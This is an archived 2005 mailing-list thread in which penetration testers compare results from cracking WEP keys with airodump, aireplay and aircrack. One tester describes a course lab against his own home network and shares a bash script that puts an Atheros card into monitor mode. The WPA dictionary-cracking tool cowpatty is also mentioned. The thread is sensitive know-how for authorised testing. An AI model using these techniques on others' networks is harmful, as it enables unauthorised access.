From: Robin Wood (dninja@gmail.com)
Date: Tue Dec 13 2005 - 12:18:05 EST
Can you remember how many packets you captured for the 10 second crack?
I was running with 1million generated using aireplay of a captured packet.
Robin
On 12/13/05, Dave Bush <hockeystatman@gmail.com> wrote:
> On 12/13/05, Robin Wood <dninja@gmail.com> wrote:
> > All the examples I've seen seem to suggest that cracking should take minutes
> > not hours and all keys should be crackable. What experiences do other
> > testers have? Have I done something wrong? I abandoned the full attack after
> > 5 hours as it was running with the default fudge factor of 2 so would
> > probably not have managed to crack the key.
>
> I don't think you captured enough data.
>
> I just finished NS621 - Applied Wireless Network Security at Capitol
> College as one of the final classes in my Masters in Network Security
> (as of tomorrow evening my Masters is complete!), and lab 5 for 621
> was cracking WEP. The long and the short of cracking WEP was making
> sure you captured enough data to get the key.
>
> When I did the WEP cracking lab I had my wife's laptop start copying 6
> GB of video files from a Linux server in my house so that IV
> collisions would happen more frequently than if just Internet surfing
> was going on. FWIW Her notebook was running Windows XP SP2 and an
> 802.11G PCMCIA card, and the Linux server was running Samba to talk to
> my wife's notebook & connected to the home WLAN using a USB 802.11B
> dongle. I then had my notebook running airodump in Windows (worked
> fine in Linux too) and just let it do its thing for an hour or so. At
> that point I guessed that it'd probably captured enough so I ran
> aircrack against the file airodump created, and it cracked my home WEP
> key in about 10 seconds. No exaggeration - 10 seconds!
>
> It's important to note that I did not stop running airodump while
> running aircrack on the file. That way if I'd had to capture more IV
> collisions to be able to crack WEP, I could just try it again later.
>
> Running aircrack in Linux yielded similar results to running it in
> Windows as far as performance goes. (ie: 10 seconds in Linux too)
>
> I've never gotten Air Snort to work in either Windows or Linux. I'm
> running the drivers from Wild Packets in Windows, and everything I've
> read says it should work on my Atheros based chipset wirelss card but
> my results are obviously different. Running Air Snort in Linux will
> capture data, but after leaving it going overnight it never did crack
> WEP. This was while performing the same 6 GB copy from the Linux
> server to my wife's notebook, so I know enough IV collisions should
> have been captured.
>
> I also tried using aircrack against the tcpdump files that Kismet
> kicked out after letting Kismet run for hours, and that didn't work
> either.
>
> NOTE: You have to be careful how you set your card in Linux to get it
> to work right with airodump or most any other wireless tool. Here's
> the script I use to configure my Atheros card for stuff like this:
>
> #!/bin/bash
> #
> # -----------------------------------------------------
> # ! This script written by Dave Bush for use in !
> # ! Capitol College's NS621-L01 Fall 2005 class !
> # ! !
> # ! This works well for me, and hopefully can be !
> # ! used as a starting point for others exploring !
> # ! wireless tools in Linux. I've used this for !
> # ! setting up wireless for both Kismet and AirSnort. !
> # ! !
> # ! Please direct any questions to me at !
> # ! hockeystatman@gmail.com !
> # -----------------------------------------------------
> #
> # Set card to 802.11b mode
> #
> iwpriv ath0 mode 2
> #
> # Set the speed for 802.11b
> #
> iwconfig ath0 rate 11M
> #
> # Set card to adhoc mode
> #
> iwpriv authmode 1
> #
> # Clear any WEP key that has been set
> #
> iwconfig ath0 key off
> #
> # Clear any SSID that has been set
> #
> iwconfig ath0 essid any
> #
> # Set card into monitor mode
> #
> iwconfig ath0 mode monitor
> #
> # -----------------------------------------------------
> # ! The wireless card should now be ready for use by !
> # ! Kismet, AirSnort, and other Linux-based wireless !
> # ! auditing tools. !
> # -----------------------------------------------------
>
> Long story short - airodump and aircrack worked fine for me once my
> card was correctly configured, but nothing else I've done has worked.
>
> > I've also seen a video on the Remote Exploit site showing a WPA key cracked
> > in 10 minutes using cowpatty and a dictionary attack. How realistic is this?
>
> Not sure, but I'm guessing it was WPA with a pre-shared key. Can you
> send a link to the video?
>
> Regards,
> - Dave
> --
> Dave Bush <hockeystatman@gmail.com>
>
> There are two seasons in my world - Hockey and Construction
>
> ------------------------------------------------------------------------------
> Audit your website security with Acunetix Web Vulnerability Scanner:
>
> Hackers are concentrating their efforts on attacking applications on your
> website. Up to 75% of cyber attacks are launched on shopping carts, forms,
> login pages, dynamic content etc. Firewalls, SSL and locked-down servers are
> futile against web application hacking. Check your website for vulnerabilities
> to SQL injection, Cross site scripting and other web attacks before hackers do!
> Download Trial at:
>
> http://www.securityfocus.com/sponsor/pen-test_050831
> -------------------------------------------------------------------------------
>
>
------------------------------------------------------------------------------
Audit your website security with Acunetix Web Vulnerability Scanner:
Hackers are concentrating their efforts on attacking applications on your
website. Up to 75% of cyber attacks are launched on shopping carts, forms,
login pages, dynamic content etc. Firewalls, SSL and locked-down servers are
futile against web application hacking. Check your website for vulnerabilities
to SQL injection, Cross site scripting and other web attacks before hackers do!
Download Trial at:
http://www.securityfocus.com/sponsor/pen-test_050831
-------------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:55:16 EDT